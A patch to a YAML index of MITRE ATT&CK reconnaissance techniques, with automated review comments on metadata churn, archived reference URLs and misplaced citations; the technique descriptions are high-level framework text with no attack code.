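Review bot: both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1591.002 with no replacement, whereas T1593.002 in the hunk above gets `x_mitre_attack_spec_version: 3.2.0` added. After this patch some techniques carry an attack spec version and some carry none (the same pattern repeats for T1592.004, T1596.004, T1591, T1590, T1592.003, T1592.002, T1593.001 and T1591.004); if that mirrors upstream exactly it is acceptable, but any code reading this field must tolerate its absence.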
@@ -56195,29 +56882,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -56226,15 +56894,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -56260,7 +56947,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -56278,47 +56965,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56327,19 +56977,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
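Review bot: the `ACSC Email Spoofing` URL now points to a web.archive.org snapshot whose path segment `20210708014107` dates it to 2021-07-08, but the description still says "Retrieved October 19, 2020", a date before that snapshot existed. Bump the Retrieved date the way the `OPM Leak` entry does in the T1589.003 hunk above (archive URL substituted and Retrieved date updated together), or the two lines contradict each other. The `x_mitre_modified_by_ref` move from after `x_mitre_version` to the end of the object is pure key-order churn.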
@@ -56362,7 +57048,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56378,8 +57064,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -56405,7 +57089,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56421,8 +57105,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -56450,7 +57132,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56466,12 +57148,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
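Review bot: unchanged context, but "social media, new sites" in the T1593 description reads as a typo for "news sites"; not introduced by this patch, so it belongs upstream.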
@@ -56480,16 +57160,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
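Review bot: this hunk changes nothing but key order (`x_mitre_platforms`, `x_mitre_is_subtechnique` and `x_mitre_deprecated` move below `x_mitre_domains`), and the same reorder is what turns most other objects in this patch into delete-and-reinsert blocks. The data is unchanged, but the diff is not reviewable as a result; have the generator emit keys in a stable order (sorted, or the upstream STIX order) so that future regenerations show only real changes.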
@@ -56502,8 +57182,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
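Review bot: the `SecurityTrails Google Hacking` reference keeps its source_name and author/date line ("Borges, E. (2019, March 5)") while the URL now points at a recordedfuture.com page and the Retrieved date becomes September 12, 2024. Confirm the new URL serves the same article rather than a different Recorded Future piece on Google dorks; if it is a different page, the author and date in the description need to change with it, and the citation key (used in both the T1593 and T1593.002 descriptions) should probably be renamed as well.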
@@ -56514,52 +57194,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
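Review bot: the `(Citation: D3Secutrity CTI Feeds)` marker is dropped from the description in the same hunk that removes the matching external_references entry, so no dangling citation is left, and the 1.0 to 1.1 version bump plus the new contributor line are consistent with a text change. Note that the first sentence (purchase from "reputable private sources and databases") is now uncited; only the dark-web half of the paragraph keeps a reference.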
@@ -56581,7 +57259,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56597,8 +57275,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -56624,7 +57300,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56642,8 +57318,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -56665,7 +57339,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56681,12 +57355,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -56696,17 +57368,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
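Review bot: in the rewritten description the run `(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)` now directly follows the ScanBox watering-hole sentence, while the sentence those sources actually support ("leaks to online or other accessible data sets ... breach dumps, code repositories") has moved to the next paragraph and carries no citation at all. If this text is mirrored verbatim from upstream ATT&CK, raise it there rather than hand-editing the index; otherwise move the markers back to the leaks sentence.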
@@ -56718,6 +57393,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56728,7 +57404,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -56738,6 +57414,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
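Review bot: the new `Bleeping Computer 2easy 2021` entry formats the author as "Bill Toulas." whereas the neighbouring entries use surname-initial form ("Cimpanu, C.", "McCarthy, K."); use "Toulas, B." for consistency unless the text is being copied verbatim from upstream.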
@@ -56750,6 +57430,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56772,6 +57456,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56779,9 +57467,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56840,7 +57527,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56860,7 +57547,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
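Review bot: T1595.003 keeps `x_mitre_attack_spec_version: 2.1.0` (context line above) while `spec_version` is dropped, and the preceding hunk moves its `modified` backwards from 2022-05-24 to 2022-04-15. Every other object in this patch that keeps an attack spec version is moved to 3.2.0, so verify against upstream that this technique really is still at 2.1.0 rather than being generated from a stale copy of the source.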
@@ -56882,7 +57568,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56898,12 +57584,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56972,7 +57656,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
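Review bot: same issue as in T1598.002: the ACSC URL becomes a web.archive.org snapshot dated 2021-07-08 (`20210708014107`) while "Retrieved October 19, 2020" is left in place; update the Retrieved date so the two lines agree.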
@@ -57020,31 +57704,12 @@ reconnaissance:
